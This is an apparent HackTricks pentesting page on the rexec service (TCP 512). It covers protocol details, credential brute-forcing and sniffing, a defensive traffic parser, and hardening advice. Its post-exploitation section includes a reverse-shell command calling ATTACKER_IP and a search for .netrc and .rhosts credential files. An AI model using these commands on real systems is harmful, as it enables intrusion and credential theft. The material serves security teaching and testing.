512 - Pentesting Rexec

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Rexec (remote exec) is one of the original Berkeley r-services (together with rlogin, rsh, …). It provides remote command execution authenticated only by a clear-text username and password. The protocol was defined in the early 1980s (see RFC 1060) and is nowadays considered insecure by design. Nevertheless it is still enabled by default on some legacy UNIX / networked appliances and occasionally shows up in internal pentests.

Default Port: TCP 512 (exec)

PORT    STATE SERVICE
512/tcp open  exec

🔥 All traffic – including credentials – is sent unencrypted. Anyone able to sniff the network can obtain the username, password and command.

Protocol overview

  1. Client connects to TCP 512.
  2. Client sends three NUL-terminated strings:
     • the port number (as ASCII) where it wishes to receive stdout/stderr (often 0),
     • the username,
     • the password.
  3. A final NUL-terminated string with the command to execute is sent.
  4. The server replies with a single 8-bit status byte (0 = success, 1 = failure) followed by the command output.

If the first field is non-zero, the server opens a second TCP connection back to the client and uses it for stderr. This is useful both for manual testing and for fingerprinting filtering / firewall issues around the service.

That means you can reproduce the exchange with nothing more than echo -e and nc:

(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512

If the credentials are valid you will receive the output of id directly on the same connection.

If you want to receive stderr on a dedicated listener, ask the server to connect back to you:

nc -lvnp 4444
printf '4444\0user\0password\0id; uname -a\0' | nc <target> 512

Many common implementations (e.g. GNU rexecd) still limit the username/password fields to 16 bytes and return different diagnostic strings for invalid usernames versus invalid passwords. This matters during enumeration because some targets leak whether an account exists before you start brute forcing.

Manual use with the client

Many Linux distributions still ship the legacy client in the inetutils-rexec / rsh-client package:

rexec -l user -p password <target> "uname -a"

If -p is not supplied, the client prompts for the password interactively (still visible on the wire in clear text!).

To avoid leaving the password in your shell history / process list, GNU rexec also supports reading the password from stdin:

printf '%s\n' 'password' | rexec -l user -p - <target> "id"

This is no safer on the network; it only reduces local exposure on the attacker host.


Enumeration & Brute-forcing

Brute-force

Nmap

nmap -sV -p 512 <target>
# Confirm the classic exec service before credential attacks

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>

The rexec-brute NSE script uses the protocol described above to test credentials very quickly.

Hydra / Medusa / Ncrack

hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8

hydra has a dedicated rexec module and is still the fastest offline bruteforcer. medusa (-M REXEC) and ncrack (rexec module) can be used the same way.

Enumerating usernames via server messages

Some rexecd implementations return different errors such as Login incorrect. versus Password incorrect.. If you observe this behaviour, confirm usernames first and only then brute-force passwords:

printf '0\0root\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2
printf '0\0definitelynotreal\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2

If the messages differ, build a list of valid users before launching a large password spray.

Check related r-services

rexec itself uses password authentication, unlike the trusted-host logic of rsh / rlogin, but in practice it usually comes from the same legacy package (openbsd-inetd, inetutils, vendor UNIX bundles). If TCP 512 is open, immediately check TCP 513 and 514 as well, because .rhosts / /etc/hosts.equiv abuse can offer easy lateral-movement paths:

nmap -sV -p 512,513,514 <target>

See also:

514 - Pentesting Rsh

513 - Pentesting Rlogin

Metasploit

use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

The module will open a shell on success and store the credentials in the database.


Sniffing credentials

Because everything is clear-text, network captures are priceless. With a copy of the traffic you can extract creds without touching the target:

tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command

(In Wireshark enable Decode As … TCP 512 → REXEC to see the fields nicely parsed.)
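The request and reply formats from the protocol overview, and the credential-extraction idea from this sniffing section, as an added example that is not part of the original page: a Python parser that splits a captured rexec request into its four NUL-terminated fields, redacts the password for logging, flags connect-back requests and decodes the server's status byte. The sample bytes are constructed, not captured.

```python
"""Parse and triage rexec (TCP 512) traffic captured off the wire.

Added example, not from the original page. Wire format as in the protocol
overview: stderr port, username, password and command, each NUL-terminated;
anything after the fourth NUL is stdin destined for the remote command.
"""
from dataclasses import dataclass


@dataclass
class RexecRequest:
    stderr_port: int  # 0 = no connect-back; otherwise server dials client:port
    username: str
    password: str
    command: str

    def summary(self) -> str:
        """Log-safe one-liner: the clear-text password is never written out."""
        cb = f"connect-back:{self.stderr_port}" if self.stderr_port else "no-connect-back"
        return f"rexec user={self.username} pw=<redacted> {cb} cmd={self.command!r}"


def parse_rexec_request(payload: bytes) -> RexecRequest:
    """Split the client's first bytes into the four protocol fields.

    Raises ValueError for anything that is not a well-formed request, so a
    monitor can tell real rexec apart from unrelated traffic on port 512.
    """
    parts = payload.split(b"\0")
    if len(parts) < 5:  # four fields plus whatever follows the fourth NUL
        raise ValueError("not a complete 4-field rexec request")
    port_raw, user, passwd, cmd = parts[:4]
    if not port_raw.isdigit() or not 0 <= int(port_raw) <= 65535:
        raise ValueError("stderr port must be an ASCII integer 0..65535")
    return RexecRequest(int(port_raw), user.decode("latin-1"),
                        passwd.decode("latin-1"), cmd.decode("latin-1"))


def parse_rexec_response(data: bytes) -> tuple[bool, bytes]:
    """Server reply: one status byte (0 = success, 1 = failure), then output."""
    if not data:
        raise ValueError("empty response")
    return data[0] == 0, data[1:]


# Constructed samples mirroring the printf example above and a successful reply.
SAMPLE_REQUEST = b"4444\0user\0password\0id; uname -a\0"
SAMPLE_RESPONSE = b"\x00uid=1000(user) gid=1000(user)\n"

if __name__ == "__main__":
    print(parse_rexec_request(SAMPLE_REQUEST).summary())
    ok, out = parse_rexec_response(SAMPLE_RESPONSE)
    print("success" if ok else "failure", out.decode())
```

A non-zero stderr port in the summary is worth alerting on by itself: it tells the defender the server will open an outbound connection back to the client, which is also what the page suggests for probing firewall behaviour around the service.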


Post-Exploitation tips

  • Commands run with the privileges of the supplied user. If /etc/pam.d/rexec is misconfigured (e.g. pam_rootok), root shells are sometimes obtainable.
  • Rexec ignores the user's login shell and executes the command via /bin/sh -c <cmd>. You can therefore use the usual shell-escape tricks (;, $( ), backticks) to chain multiple commands or spawn reverse shells:
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
  • Passwords are frequently stored in ~/.netrc or legacy automation scripts on other systems; once you compromise one host you can reuse them for lateral movement:
find / -xdev \( -name .netrc -o -name netrc -o -iname '*rexec*' -o -path '*/.rhosts' \) 2>/dev/null

Hardening / Detection

  • Do not expose rexec; replace it with SSH. Almost all modern inetd superservers ship the service commented out by default.
  • If you must keep it, restrict access with TCP wrappers (/etc/hosts.allow) or firewall rules and enforce strong passwords for every account.
  • Monitor traffic towards :512 and launches of the rexecd process. A single packet capture is enough to detect a compromise.
  • Disable rexec, rlogin and rsh together – they share most of their codebase and weaknesses.
